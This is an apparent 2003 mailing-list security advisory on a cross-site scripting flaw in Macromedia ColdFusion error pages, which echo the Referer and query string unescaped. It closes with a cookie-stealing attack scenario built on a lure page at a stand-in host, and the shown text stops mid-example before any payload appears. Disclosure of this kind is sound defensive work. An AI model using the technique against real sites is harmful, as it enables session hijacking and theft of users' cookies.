[VulnWatch] ColdFusion cross-site scripting security vulnerability of an error page
From: T.Hara (pfh00062_at_nifty.com)
Date: Tue, 23 Sep 2003 12:57:42 +0900 To: firstname.lastname@example.org
ColdFusion cross-site scripting security vulnerability of an error page
--> The outline of vulnerability
Macromedia's ColdFusion can display the various information about an
error at the time of error occurred.
There is information transmitted from a client machine like "Referer".
ColdFusion displays the information as it is.
An attacker can execute a script on victim's browser by preparing for
WEB the link which embedded arbitrary scripts.
--> User's risk
The user who accesses a vulnerable server has a risk that forced to
Risks of being assumed are below.
session high-jack ( by stolen cookie )
page defacement by embedded html tags.
It is insecure to store critical information ( such as personal
information ) without encryption in cookie. Such a poor
application will make risk bigger when session-highjack occurs.
--> The range of influence
This problem is contained in the error page of all versions of
This problem does not occurred when ColdFusion's error page does not
include the contents transmitted from client machines ( such as "Referer"
--> About vulnerability
In Cold Fusion, an error screen is displayed at the time of error
It is possible to display the contents transmitted from the client
machine (#error.HTTPReferer#) as it is.
When the code for an attack is contained in the contents to display, a
cross-site scripting attack can be executed.
For example, the script will be executed when the script for an attack
is embedded by "Referer" in #error.HTTPReferer#, and an error screen is
The same problem exists in the #error.QueryString# .
--> Sample attack
User using Cold Fusion of the site A (www.CFtestA.com).
The method of stealing cookie is bellow.
1. An attacker creates the page B (www.atack_testA.com/cf.html) with the
link to the site A.
2. Next, after considering the invitation complaint which is easy to
guide victims, such as present collection, to another page, the link to
Page B is attached.
A code for an attack is embedded into this link, that code remains as
"Referer" information as it is, and when it clicks the link to the site
A which has a victim in Page B, it will be executed.
Example: <a href ="http://www.atack_testA.com/cf.html?